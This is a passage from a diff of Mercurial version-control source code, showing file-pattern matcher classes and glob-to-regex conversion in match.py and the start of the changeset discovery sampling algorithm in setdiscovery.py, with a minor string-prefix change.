917 917 def bad(self, f, msg):
918 918 self._matcher.bad(self._path + "/" + f, msg)
919 919
920 920 def matchfn(self, f):
921 921 # Some information is lost in the superclass's constructor, so we
922 922 # can not accurately create the matching function for the subdirectory
923 923 # from the inputs. Instead, we override matchfn() and visitdir() to
924 924 # call the original matcher with the subdirectory path prepended.
925 925 return self._matcher.matchfn(self._path + "/" + f)
926 926
927 927 def visitdir(self, dir):
928 928 dir = normalizerootdir(dir, 'visitdir')
929 929 if dir == '':
930 930 dir = self._path
931 931 else:
932 932 dir = self._path + "/" + dir
933 933 return self._matcher.visitdir(dir)
934 934
935 935 def visitchildrenset(self, dir):
936 936 dir = normalizerootdir(dir, 'visitchildrenset')
937 937 if dir == '':
938 938 dir = self._path
939 939 else:
940 940 dir = self._path + "/" + dir
941 941 return self._matcher.visitchildrenset(dir)
942 942
943 943 def always(self):
944 944 return self._always
945 945
946 946 def prefix(self):
947 947 return self._matcher.prefix() and not self._always
948 948
949 949 @encoding.strmethod
950 950 def __repr__(self):
951 951 return ('<subdirmatcher path=%r, matcher=%r>' %
952 952 (self._path, self._matcher))
953 953
954 954 class prefixdirmatcher(basematcher):
955 955 """Adapt a matcher to work on a parent directory.
956 956
957 957 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
958 958 ignored.
959 959
960 960 The prefix path should usually be the relative path from the root of
961 961 this matcher to the root of the wrapped matcher.
962 962
963 963 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
964 964 >>> m2 = prefixdirmatcher(b'd/e', m1)
965 965 >>> m2(b'a.txt')
966 966 False
967 967 >>> m2(b'd/e/a.txt')
968 968 True
969 969 >>> m2(b'd/e/b.txt')
970 970 False
971 971 >>> m2.files()
972 972 ['d/e/a.txt', 'd/e/f/b.txt']
973 973 >>> m2.exact(b'd/e/a.txt')
974 974 True
975 975 >>> m2.visitdir(b'd')
976 976 True
977 977 >>> m2.visitdir(b'd/e')
978 978 True
979 979 >>> m2.visitdir(b'd/e/f')
980 980 True
981 981 >>> m2.visitdir(b'd/e/g')
982 982 False
983 983 >>> m2.visitdir(b'd/ef')
984 984 False
985 985 """
986 986
987 987 def __init__(self, path, matcher, badfn=None):
988 988 super(prefixdirmatcher, self).__init__(badfn)
989 989 if not path:
990 990 raise error.ProgrammingError('prefix path must not be empty')
991 991 self._path = path
992 992 self._pathprefix = path + '/'
993 993 self._matcher = matcher
994 994
995 995 @propertycache
996 996 def _files(self):
997 997 return [self._pathprefix + f for f in self._matcher._files]
998 998
999 999 def matchfn(self, f):
1000 1000 if not f.startswith(self._pathprefix):
1001 1001 return False
1002 1002 return self._matcher.matchfn(f[len(self._pathprefix):])
1003 1003
1004 1004 @propertycache
1005 1005 def _pathdirs(self):
1006 1006 return set(util.finddirs(self._path))
1007 1007
1008 1008 def visitdir(self, dir):
1009 1009 if dir == self._path:
1010 1010 return self._matcher.visitdir('')
1011 1011 if dir.startswith(self._pathprefix):
1012 1012 return self._matcher.visitdir(dir[len(self._pathprefix):])
1013 1013 return dir in self._pathdirs
1014 1014
1015 1015 def visitchildrenset(self, dir):
1016 1016 if dir == self._path:
1017 1017 return self._matcher.visitchildrenset('')
1018 1018 if dir.startswith(self._pathprefix):
1019 1019 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1020 1020 if dir in self._pathdirs:
1021 1021 return 'this'
1022 1022 return set()
1023 1023
1024 1024 def isexact(self):
1025 1025 return self._matcher.isexact()
1026 1026
1027 1027 def prefix(self):
1028 1028 return self._matcher.prefix()
1029 1029
1030 1030 @encoding.strmethod
1031 1031 def __repr__(self):
1032 1032 return ('<prefixdirmatcher path=%r, matcher=%r>'
1033 1033 % (pycompat.bytestr(self._path), self._matcher))
1034 1034
1035 1035 class unionmatcher(basematcher):
1036 1036 """A matcher that is the union of several matchers.
1037 1037
1038 1038 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1039 1039 the first matcher.
1040 1040 """
1041 1041
1042 1042 def __init__(self, matchers):
1043 1043 m1 = matchers[0]
1044 1044 super(unionmatcher, self).__init__()
1045 1045 self.explicitdir = m1.explicitdir
1046 1046 self.traversedir = m1.traversedir
1047 1047 self._matchers = matchers
1048 1048
1049 1049 def matchfn(self, f):
1050 1050 for match in self._matchers:
1051 1051 if match(f):
1052 1052 return True
1053 1053 return False
1054 1054
1055 1055 def visitdir(self, dir):
1056 1056 r = False
1057 1057 for m in self._matchers:
1058 1058 v = m.visitdir(dir)
1059 1059 if v == 'all':
1060 1060 return v
1061 1061 r |= v
1062 1062 return r
1063 1063
1064 1064 def visitchildrenset(self, dir):
1065 1065 r = set()
1066 1066 this = False
1067 1067 for m in self._matchers:
1068 1068 v = m.visitchildrenset(dir)
1069 1069 if not v:
1070 1070 continue
1071 1071 if v == 'all':
1072 1072 return v
1073 1073 if this or v == 'this':
1074 1074 this = True
1075 1075 # don't break, we might have an 'all' in here.
1076 1076 continue
1077 1077 assert isinstance(v, set)
1078 1078 r = r.union(v)
1079 1079 if this:
1080 1080 return 'this'
1081 1081 return r
1082 1082
1083 1083 @encoding.strmethod
1084 1084 def __repr__(self):
1085 1085 return ('<unionmatcher matchers=%r>' % self._matchers)
1086 1086
1087 1087 def patkind(pattern, default=None):
1088 1088 '''If pattern is 'kind:pat' with a known kind, return kind.
1089 1089
1090 1090 >>> patkind(br're:.*\.c$')
1091 1091 're'
1092 1092 >>> patkind(b'glob:*.c')
1093 1093 'glob'
1094 1094 >>> patkind(b'relpath:test.py')
1095 1095 'relpath'
1096 1096 >>> patkind(b'main.py')
1097 1097 >>> patkind(b'main.py', default=b're')
1098 1098 're'
1099 1099 '''
1100 1100 return _patsplit(pattern, default)[0]
1101 1101
1102 1102 def _patsplit(pattern, default):
1103 1103 """Split a string into the optional pattern kind prefix and the actual
1104 1104 pattern."""
1105 1105 if ':' in pattern:
1106 1106 kind, pat = pattern.split(':', 1)
1107 1107 if kind in allpatternkinds:
1108 1108 return kind, pat
1109 1109 return default, pattern
1110 1110
1111 1111 def _globre(pat):
1112 1112 r'''Convert an extended glob string to a regexp string.
1113 1113
1114 1114 >>> from . import pycompat
1115 1115 >>> def bprint(s):
1116 1116 ... print(pycompat.sysstr(s))
1117 1117 >>> bprint(_globre(br'?'))
1118 1118 .
1119 1119 >>> bprint(_globre(br'*'))
1120 1120 [^/]*
1121 1121 >>> bprint(_globre(br'**'))
1122 1122 .*
1123 1123 >>> bprint(_globre(br'**/a'))
1124 1124 (?:.*/)?a
1125 1125 >>> bprint(_globre(br'a/**/b'))
1126 1126 a/(?:.*/)?b
1127 1127 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1128 1128 [a*?!^][\^b][^c]
1129 1129 >>> bprint(_globre(br'{a,b}'))
1130 1130 (?:a|b)
1131 1131 >>> bprint(_globre(br'.\*\?'))
1132 1132 \.\*\?
1133 1133 '''
1134 1134 i, n = 0, len(pat)
1135 1135 res = ''
1136 1136 group = 0
1137 1137 escape = util.stringutil.regexbytesescapemap.get
1138 1138 def peek():
1139 1139 return i < n and pat[i:i + 1]
1140 1140 while i < n:
1141 1141 c = pat[i:i + 1]
1142 1142 i += 1
1143 1143 if c not in '*?[{},\\':
1144 1144 res += escape(c, c)
1145 1145 elif c == '*':
1146 1146 if peek() == '*':
1147 1147 i += 1
1148 1148 if peek() == '/':
1149 1149 i += 1
1150 1150 res += '(?:.*/)?'
1151 1151 else:
1152 1152 res += '.*'
1153 1153 else:
1154 1154 res += '[^/]*'
1155 1155 elif c == '?':
1156 1156 res += '.'
1157 1157 elif c == '[':
1158 1158 j = i
1159 1159 if j < n and pat[j:j + 1] in '!]':
1160 1160 j += 1
1161 1161 while j < n and pat[j:j + 1] != ']':
1162 1162 j += 1
1163 1163 if j >= n:
1164 1164 res += '\\['
1165 1165 else:
1166 1166 stuff = pat[i:j].replace('\\','\\\\')
1167 1167 i = j + 1
1168 1168 if stuff[0:1] == '!':
1169 1169 stuff = '^' + stuff[1:]
1170 1170 elif stuff[0:1] == '^':
1171 1171 stuff = '\\' + stuff
1172 1172 res = '%s[%s]' % (res, stuff)
1173 1173 elif c == '{':
1174 1174 group += 1
1175 1175 res += '(?:'
1176 1176 elif c == '}' and group:
1177 1177 res += ')'
1178 1178 group -= 1
1179 1179 elif c == ',' and group:
1180 1180 res += '|'
1181 1181 elif c == '\\':
1182 1182 p = peek()
1183 1183 if p:
1184 1184 i += 1
1185 1185 res += escape(p, p)
1186 1186 else:
1187 1187 res += escape(c, c)
1188 1188 else:
1189 1189 res += escape(c, c)
1190 1190 return res
1191 1191
1192 1192 def _regex(kind, pat, globsuffix):
1193 1193 '''Convert a (normalized) pattern of any kind into a
1194 1194 regular expression.
1195 1195 globsuffix is appended to the regexp of globs.'''
1196 1196
1197 1197 if rustmod is not None:
1198 1198 try:
1199 1199 return rustmod.build_single_regex(
1200 1200 kind,
1201 1201 pat,
1202 1202 globsuffix
1203 1203 )
1204 1204 except rustmod.PatternError:
1205 1205 raise error.ProgrammingError(
1206 1206 'not a regex pattern: %s:%s' % (kind, pat)
1207 1207 )
1208 1208
1209 1209 if not pat and kind in ('glob', 'relpath'):
1210 1210 return ''
1211 1211 if kind == 're':
1212 1212 return pat
1213 1213 if kind in ('path', 'relpath'):
1214 1214 if pat == '.':
1215 1215 return ''
1216 1216 return util.stringutil.reescape(pat) + '(?:/|$)'
1217 1217 if kind == 'rootfilesin':
1218 1218 if pat == '.':
1219 1219 escaped = ''
1220 1220 else:
1221 1221 # Pattern is a directory name.
1222 1222 escaped = util.stringutil.reescape(pat) + '/'
1223 1223 # Anything after the pattern must be a non-directory.
1224 1224 return escaped + '[^/]+$'
1225 1225 if kind == 'relglob':
1226 1226 return '(?:|.*/)' + _globre(pat) + globsuffix
1227 1227 if kind == 'relre':
1228 1228 if pat.startswith('^'):
1229 1229 return pat
1230 1230 return '.*' + pat
1231 1231 if kind in ('glob', 'rootglob'):
1232 1232 return _globre(pat) + globsuffix
1233 1233 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
1234 1234
1235 1235 def _buildmatch(kindpats, globsuffix, root):
1236 1236 '''Return regexp string and a matcher function for kindpats.
1237 1237 globsuffix is appended to the regexp of globs.'''
1238 1238 matchfuncs = []
1239 1239
1240 1240 subincludes, kindpats = _expandsubinclude(kindpats, root)
1241 1241 if subincludes:
1242 1242 submatchers = {}
1243 1243 def matchsubinclude(f):
1244 1244 for prefix, matcherargs in subincludes:
1245 1245 if f.startswith(prefix):
1246 1246 mf = submatchers.get(prefix)
1247 1247 if mf is None:
1248 1248 mf = match(*matcherargs)
1249 1249 submatchers[prefix] = mf
1250 1250
1251 1251 if mf(f[len(prefix):]):
1252 1252 return True
1253 1253 return False
1254 1254 matchfuncs.append(matchsubinclude)
1255 1255
1256 1256 regex = ''
1257 1257 if kindpats:
1258 1258 if all(k == 'rootfilesin' for k, p, s in kindpats):
1259 1259 dirs = {p for k, p, s in kindpats}
1260 1260 def mf(f):
1261 1261 i = f.rfind('/')
1262 1262 if i >= 0:
1263 1263 dir = f[:i]
1264 1264 else:
1265 1265 dir = '.'
1266 1266 return dir in dirs
1267 1267 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1268 1268 matchfuncs.append(mf)
1269 1269 else:
1270 1270 regex, mf = _buildregexmatch(kindpats, globsuffix)
1271 1271 matchfuncs.append(mf)
1272 1272
1273 1273 if len(matchfuncs) == 1:
1274 1274 return regex, matchfuncs[0]
1275 1275 else:
1276 1276 return regex, lambda f: any(mf(f) for mf in matchfuncs)
1277 1277
1278 1278 MAX_RE_SIZE = 20000
1279 1279
1280 1280 def _joinregexes(regexps):
1281 1281 """gather multiple regular expressions into a single one"""
1282 1282 return '|'.join(regexps)
1283 1283
1284 1284 def _buildregexmatch(kindpats, globsuffix):
1285 1285 """Build a match function from a list of kinds and kindpats,
1286 1286 return regexp string and a matcher function.
1287 1287
1288 1288 Test too large input
1289 1289 >>> _buildregexmatch([
1290 1290 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1291 1291 ... ], b'$')
1292 1292 Traceback (most recent call last):
1293 1293 ...
1294 1294 Abort: matcher pattern is too long (20009 bytes)
1295 1295 """
1296 1296 try:
1297 1297 allgroups = []
1298 1298 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1299 1299 fullregexp = _joinregexes(regexps)
1300 1300
1301 1301 startidx = 0
1302 1302 groupsize = 0
1303 1303 for idx, r in enumerate(regexps):
1304 1304 piecesize = len(r)
1305 1305 if piecesize > MAX_RE_SIZE:
1306 1306 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1307 1307 raise error.Abort(msg)
1308 1308 elif (groupsize + piecesize) > MAX_RE_SIZE:
1309 1309 group = regexps[startidx:idx]
1310 1310 allgroups.append(_joinregexes(group))
1311 1311 startidx = idx
1312 1312 groupsize = 0
1313 1313 groupsize += piecesize + 1
1314 1314
1315 1315 if startidx == 0:
1316 1316 matcher = _rematcher(fullregexp)
1317 1317 func = lambda s: bool(matcher(s))
1318 1318 else:
1319 1319 group = regexps[startidx:]
1320 1320 allgroups.append(_joinregexes(group))
1321 1321 allmatchers = [_rematcher(g) for g in allgroups]
1322 1322 func = lambda s: any(m(s) for m in allmatchers)
1323 1323 return fullregexp, func
1324 1324 except re.error:
1325 1325 for k, p, s in kindpats:
1326 1326 try:
1327 1327 _rematcher(_regex(k, p, globsuffix))
1328 1328 except re.error:
1329 1329 if s:
1330 1330 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1331 1331 (s, k, p))
1332 1332 else:
1333 1333 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1334 1334 raise error.Abort(_("invalid pattern"))
1335 1335
1336 1336 def _patternrootsanddirs(kindpats):
1337 1337 '''Returns roots and directories corresponding to each pattern.
1338 1338
1339 1339 This calculates the roots and directories exactly matching the patterns and
1340 1340 returns a tuple of (roots, dirs) for each. It does not return other
1341 1341 directories which may also need to be considered, like the parent
1342 1342 directories.
1343 1343 '''
1344 1344 r = []
1345 1345 d = []
1346 1346 for kind, pat, source in kindpats:
1347 1347 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1348 1348 root = []
1349 1349 for p in pat.split('/'):
1350 1350 if '[' in p or '{' in p or '*' in p or '?' in p:
1351 1351 break
1352 1352 root.append(p)
1353 1353 r.append('/'.join(root))
1354 1354 elif kind in ('relpath', 'path'):
1355 1355 if pat == '.':
1356 1356 pat = ''
1357 1357 r.append(pat)
1358 1358 elif kind in ('rootfilesin',):
1359 1359 if pat == '.':
1360 1360 pat = ''
1361 1361 d.append(pat)
1362 1362 else: # relglob, re, relre
1363 1363 r.append('')
1364 1364 return r, d
1365 1365
1366 1366 def _roots(kindpats):
1367 1367 '''Returns root directories to match recursively from the given patterns.'''
1368 1368 roots, dirs = _patternrootsanddirs(kindpats)
1369 1369 return roots
1370 1370
1371 1371 def _rootsdirsandparents(kindpats):
1372 1372 '''Returns roots and exact directories from patterns.
1373 1373
1374 1374 `roots` are directories to match recursively, `dirs` should
1375 1375 be matched non-recursively, and `parents` are the implicitly required
1376 1376 directories to walk to items in either roots or dirs.
1377 1377
1378 1378 Returns a tuple of (roots, dirs, parents).
1379 1379
1380 1380 >>> r = _rootsdirsandparents(
1381 1381 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1382 1382 ... (b'glob', b'g*', b'')])
1383 1383 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1384 1384 (['g/h', 'g/h', ''], []) ['', 'g']
1385 1385 >>> r = _rootsdirsandparents(
1386 1386 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1387 1387 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1388 1388 ([], ['g/h', '']) ['', 'g']
1389 1389 >>> r = _rootsdirsandparents(
1390 1390 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1391 1391 ... (b'path', b'', b'')])
1392 1392 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1393 1393 (['r', 'p/p', ''], []) ['', 'p']
1394 1394 >>> r = _rootsdirsandparents(
1395 1395 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1396 1396 ... (b'relre', b'rr', b'')])
1397 1397 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1398 1398 (['', '', ''], []) ['']
1399 1399 '''
1400 1400 r, d = _patternrootsanddirs(kindpats)
1401 1401
1402 1402 p = set()
1403 1403 # Add the parents as non-recursive/exact directories, since they must be
1404 1404 # scanned to get to either the roots or the other exact directories.
1405 1405 p.update(util.dirs(d))
1406 1406 p.update(util.dirs(r))
1407 1407
1408 1408 # FIXME: all uses of this function convert these to sets, do so before
1409 1409 # returning.
1410 1410 # FIXME: all uses of this function do not need anything in 'roots' and
1411 1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1412 1412 return r, d, p
1413 1413
1414 1414 def _explicitfiles(kindpats):
1415 1415 '''Returns the potential explicit filenames from the patterns.
1416 1416
1417 1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1418 1418 ['foo/bar']
1419 1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1420 1420 []
1421 1421 '''
1422 1422 # Keep only the pattern kinds where one can specify filenames (vs only
1423 1423 # directory names).
1424 1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1425 1425 return _roots(filable)
1426 1426
1427 1427 def _prefix(kindpats):
1428 1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1429 1429 for kind, pat, source in kindpats:
1430 1430 if kind not in ('path', 'relpath'):
1431 1431 return False
1432 1432 return True
1433 1433
1434 1434 _commentre = None
1435 1435
1436 1436 def readpatternfile(filepath, warn, sourceinfo=False):
1437 1437 '''parse a pattern file, returning a list of
1438 1438 patterns. These patterns should be given to compile()
1439 1439 to be validated and converted into a match function.
1440 1440
1441 1441 trailing white space is dropped.
1442 1442 the escape character is backslash.
1443 1443 comments start with #.
1444 1444 empty lines are skipped.
1445 1445
1446 1446 lines can be of the following formats:
1447 1447
1448 1448 syntax: regexp # defaults following lines to non-rooted regexps
1449 1449 syntax: glob # defaults following lines to non-rooted globs
1450 1450 re:pattern # non-rooted regular expression
1451 1451 glob:pattern # non-rooted glob
1452 1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1453 1453 pattern # pattern of the current default type
1454 1454
1455 1455 if sourceinfo is set, returns a list of tuples:
1456 1456 (pattern, lineno, originalline).
1457 1457 This is useful to debug ignore patterns.
1458 1458 '''
1459 1459
1460 1460 if rustmod is not None:
1461 1461 result, warnings = rustmod.read_pattern_file(
1462 1462 filepath,
1463 1463 bool(warn),
1464 1464 sourceinfo,
1465 1465 )
1466 1466
1467 1467 for warning_params in warnings:
1468 1468 # Can't be easily emitted from Rust, because it would require
1469 1469 # a mechanism for both gettext and calling the `warn` function.
1470 1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1471 1471
1472 1472 return result
1473 1473
1474 1474 syntaxes = {
1475 1475 're': 'relre:',
1476 1476 'regexp': 'relre:',
1477 1477 'glob': 'relglob:',
1478 1478 'rootglob': 'rootglob:',
1479 1479 'include': 'include',
1480 1480 'subinclude': 'subinclude',
1481 1481 }
1482 1482 syntax = 'relre:'
1483 1483 patterns = []
1484 1484
1485 1485 fp = open(filepath, 'rb')
1486 1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1487 1487 if "#" in line:
1488 1488 global _commentre
1489 1489 if not _commentre:
1490 1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1491 1491 # remove comments prefixed by an even number of escapes
1492 1492 m = _commentre.search(line)
1493 1493 if m:
1494 1494 line = line[:m.end(1)]
1495 1495 # fixup properly escaped comments that survived the above
1496 1496 line = line.replace("\\#", "#")
1497 1497 line = line.rstrip()
1498 1498 if not line:
1499 1499 continue
1500 1500
1501 1501 if line.startswith('syntax:'):
1502 1502 s = line[7:].strip()
1503 1503 try:
1504 1504 syntax = syntaxes[s]
1505 1505 except KeyError:
1506 1506 if warn:
1507 1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1508 1508 (filepath, s))
1509 1509 continue
1510 1510
1511 1511 linesyntax = syntax
1512 1512 for s, rels in syntaxes.iteritems():
1513 1513 if line.startswith(rels):
1514 1514 linesyntax = rels
1515 1515 line = line[len(rels):]
1516 1516 break
1517 1517 elif line.startswith(s+':'):
1518 1518 linesyntax = rels
1519 1519 line = line[len(s) + 1:]
1520 1520 break
1521 1521 if sourceinfo:
1522 1522 patterns.append((linesyntax + line, lineno, line))
1523 1523 else:
1524 1524 patterns.append(linesyntax + line)
1525 1525 fp.close()
1526 1526 return patterns
@@ -1,463 +1,463 b''
1 1 # setdiscovery.py - improved discovery of common nodeset for mercurial
2 2 #
3 3 # Copyright 2010 Benoit Boissinot <bboissin@gmail.com>
4 4 # and Peter Arrenbrecht <peter@arrenbrecht.ch>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8 """
9 9 Algorithm works in the following way. You have two repository: local and
10 10 remote. They both contains a DAG of changelists.
11 11
12 12 The goal of the discovery protocol is to find one set of node *common*,
13 13 the set of nodes shared by local and remote.
14 14
15 15 One of the issue with the original protocol was latency, it could
16 16 potentially require lots of roundtrips to discover that the local repo was a
17 17 subset of remote (which is a very common case, you usually have few changes
18 18 compared to upstream, while upstream probably had lots of development).
19 19
20 20 The new protocol only requires one interface for the remote repo: `known()`,
21 21 which given a set of changelists tells you if they are present in the DAG.
22 22
23 23 The algorithm then works as follow:
24 24
25 25 - We will be using three sets, `common`, `missing`, `unknown`. Originally
26 26 all nodes are in `unknown`.
27 27 - Take a sample from `unknown`, call `remote.known(sample)`
28 28 - For each node that remote knows, move it and all its ancestors to `common`
29 29 - For each node that remote doesn't know, move it and all its descendants
30 30 to `missing`
31 31 - Iterate until `unknown` is empty
32 32
33 33 There are a couple optimizations, first is instead of starting with a random
34 34 sample of missing, start by sending all heads, in the case where the local
35 35 repo is a subset, you computed the answer in one round trip.
36 36
37 37 Then you can do something similar to the bisecting strategy used when
38 38 finding faulty changesets. Instead of random samples, you can try picking
39 39 nodes that will maximize the number of nodes that will be
40 40 classified with it (since all ancestors or descendants will be marked as well).
41 41 """
42 42
43 43 from __future__ import absolute_import
44 44
45 45 import collections
46 46 import random
47 47
48 48 from .i18n import _
49 49 from .node import (
50 50 nullid,
51 51 nullrev,
52 52 )
53 53 from . import (
54 54 error,
55 55 policy,
56 56 util,
57 57 )
58 58
59 59 def _updatesample(revs, heads, sample, parentfn, quicksamplesize=0):
60 60 """update an existing sample to match the expected size
61 61
62 62 The sample is updated with revs exponentially distant from each head of the
63 63 <revs> set. (H~1, H~2, H~4, H~8, etc).
64 64
65 65 If a target size is specified, the sampling will stop once this size is
66 66 reached. Otherwise sampling will happen until roots of the <revs> set are
67 67 reached.
68 68
69 69 :revs: set of revs we want to discover (if None, assume the whole dag)
70 70 :heads: set of DAG head revs
71 71 :sample: a sample to update
72 72 :parentfn: a callable to resolve parents for a revision
73 73 :quicksamplesize: optional target size of the sample"""
74 74 dist = {}
75 75 visit = collections.deque(heads)
76 76 seen = set()
77 77 factor = 1
78 78 while visit:
79 79 curr = visit.popleft()
80 80 if curr in seen:
81 81 continue
82 82 d = dist.setdefault(curr, 1)
83 83 if d > factor:
84 84 factor *= 2
85 85 if d == factor:
86 86 sample.add(curr)
87 87 if quicksamplesize and (len(sample) >= quicksamplesize):
88 88 return
89 89 seen.add(curr)
90 90
91 91 for p in parentfn(curr):
92 92 if p != nullrev and (not revs or p in revs):
93 93 dist.setdefault(p, d + 1)
94 94 visit.append(p)
95 95
96 96 def _limitsample(sample, desiredlen, randomize=True):
97 97 """return a random subset of sample of at most desiredlen item.
98 98
99 99 If randomize is False, though, a deterministic subset is returned.
100 100 This is meant for integration tests.
101 101 """
102 102 if len(sample) <= desiredlen:
103 103 return sample
104 104 if randomize:
105 105 return set(random.sample(sample, desiredlen))
106 106 sample = list(sample)
107 107 sample.sort()
108 108 return set(sample[:desiredlen])
109 109
110 110 class partialdiscovery(object):
111 111 """an object representing ongoing discovery
112 112
113 113 Feed with data from the remote repository, this object keep track of the
114 114 current set of changeset in various states:
115 115
116 116 - common: revs also known remotely
117 117 - undecided: revs we don't have information on yet
118 118 - missing: revs missing remotely
119 119 (all tracked revisions are known locally)
120 120 """
121 121
122 122 def __init__(self, repo, targetheads, respectsize, randomize=True):
123 123 self._repo = repo
124 124 self._targetheads = targetheads
125 125 self._common = repo.changelog.incrementalmissingrevs()
126 126 self._undecided = None
127 127 self.missing = set()
128 128 self._childrenmap = None
129 129 self._respectsize = respectsize
130 130 self.randomize = randomize
131 131
132 132 def addcommons(self, commons):
133 133 """register nodes known as common"""
134 134 self._common.addbases(commons)
135 135 if self._undecided is not None:
136 136 self._common.removeancestorsfrom(self._undecided)
137 137
138 138 def addmissings(self, missings):
139 139 """register some nodes as missing"""
140 140 newmissing = self._repo.revs('%ld::%ld', missings, self.undecided)
141 141 if newmissing:
142 142 self.missing.update(newmissing)
143 143 self.undecided.difference_update(newmissing)
144 144
145 145 def addinfo(self, sample):
146 146 """consume an iterable of (rev, known) tuples"""
147 147 common = set()
148 148 missing = set()
149 149 for rev, known in sample:
150 150 if known:
151 151 common.add(rev)
152 152 else:
153 153 missing.add(rev)
154 154 if common:
155 155 self.addcommons(common)
156 156 if missing:
157 157 self.addmissings(missing)
158 158
159 159 def hasinfo(self):
160 160 """return True is we have any clue about the remote state"""
161 161 return self._common.hasbases()
162 162
163 163 def iscomplete(self):
164 164 """True if all the necessary data have been gathered"""
165 165 return self._undecided is not None and not self._undecided
166 166
167 167 @property
168 168 def undecided(self):
169 169 if self._undecided is not None:
170 170 return self._undecided
171 171 self._undecided = set(self._common.missingancestors(self._targetheads))
172 172 return self._undecided
173 173
174 174 def stats(self):
175 175 return {
176 176 'undecided': len(self.undecided),
177 177 }
178 178
179 179 def commonheads(self):
180 180 """the heads of the known common set"""
181 181 # heads(common) == heads(common.bases) since common represents
182 182 # common.bases and all its ancestors
183 183 return self._common.basesheads()
184 184
185 185 def _parentsgetter(self):
186 186 getrev = self._repo.changelog.index.__getitem__
187 187 def getparents(r):
188 188 return getrev(r)[5:7]
189 189 return getparents
190 190
191 191 def _childrengetter(self):
192 192
193 193 if self._childrenmap is not None:
194 194 # During discovery, the `undecided` set keep shrinking.
195 195 # Therefore, the map computed for an iteration N will be
196 196 # valid for iteration N+1. Instead of computing the same
197 197 # data over and over we cached it the first time.
198 198 return self._childrenmap.__getitem__
199 199
200 200 # _updatesample() essentially does interaction over revisions to look
201 201 # up their children. This lookup is expensive and doing it in a loop is
202 202 # quadratic. We precompute the children for all relevant revisions and
203 203 # make the lookup in _updatesample() a simple dict lookup.
204 204 self._childrenmap = children = {}
205 205
206 206 parentrevs = self._parentsgetter()
207 207 revs = self.undecided
208 208
209 209 for rev in sorted(revs):
210 210 # Always ensure revision has an entry so we don't need to worry
211 211 # about missing keys.
212 212 children[rev] = []
213 213 for prev in parentrevs(rev):
214 214 if prev == nullrev:
215 215 continue
216 216 c = children.get(prev)
217 217 if c is not None:
218 218 c.append(rev)
219 219 return children.__getitem__
220 220
221 221 def takequicksample(self, headrevs, size):
222 222 """takes a quick sample of size <size>
223 223
224 224 It is meant for initial sampling and focuses on querying heads and close
225 225 ancestors of heads.
226 226
227 227 :headrevs: set of head revisions in local DAG to consider
228 228 :size: the maximum size of the sample"""
229 229 revs = self.undecided
230 230 if len(revs) <= size:
231 231 return list(revs)
232 232 sample = set(self._repo.revs('heads(%ld)', revs))
233 233
234 234 if len(sample) >= size:
235 235 return _limitsample(sample, size, randomize=self.randomize)
236 236
237 237 _updatesample(None, headrevs, sample, self._parentsgetter(),
238 238 quicksamplesize=size)
239 239 return sample
240 240
241 241 def takefullsample(self, headrevs, size):
242 242 revs = self.undecided
243 243 if len(revs) <= size:
244 244 return list(revs)
245 245 repo = self._repo
246 246 sample = set(repo.revs('heads(%ld)', revs))
247 247 parentrevs = self._parentsgetter()
248 248
249 249 # update from heads
250 250 revsheads = sample.copy()
251 251 _updatesample(revs, revsheads, sample, parentrevs)
252 252
253 253 # update from roots
254 254 revsroots = set(repo.revs('roots(%ld)', revs))
255 255 childrenrevs = self._childrengetter()
256 256 _updatesample(revs, revsroots, sample, childrenrevs)
257 257 assert sample
258 258
259 259 if not self._respectsize:
260 260 size = max(size, min(len(revsroots), len(revsheads)))
261 261
262 262 sample = _limitsample(sample, size, randomize=self.randomize)
263 263 if len(sample) < size:
264 264 more = size - len(sample)
265 265 takefrom = list(revs - sample)
266 266 if self.randomize:
267 267 sample.update(random.sample(takefrom, more))
268 268 else:
269 269 takefrom.sort()
270 270 sample.update(takefrom[:more])
271 271 return sample
272 272
273 partialdiscovery = policy.importrust('discovery',
274 member='PartialDiscovery',
273 partialdiscovery = policy.importrust(r'discovery',
274 member=r'PartialDiscovery',
275 275 default=partialdiscovery)
276 276
277 277 def findcommonheads(ui, local, remote,
278 278 initialsamplesize=100,
279 279 fullsamplesize=200,
280 280 abortwhenunrelated=True,
281 281 ancestorsof=None,
282 282 samplegrowth=1.05):
283 283 '''Return a tuple (common, anyincoming, remoteheads) used to identify
284 284 missing nodes from or in remote.
285 285 '''
286 286 start = util.timer()
287 287
288 288 roundtrips = 0
289 289 cl = local.changelog
290 290 clnode = cl.node
291 291 clrev = cl.rev
292 292
293 293 if ancestorsof is not None:
294 294 ownheads = [clrev(n) for n in ancestorsof]
295 295 else:
296 296 ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
297 297
298 298 # early exit if we know all the specified remote heads already
299 299 ui.debug("query 1; heads\n")
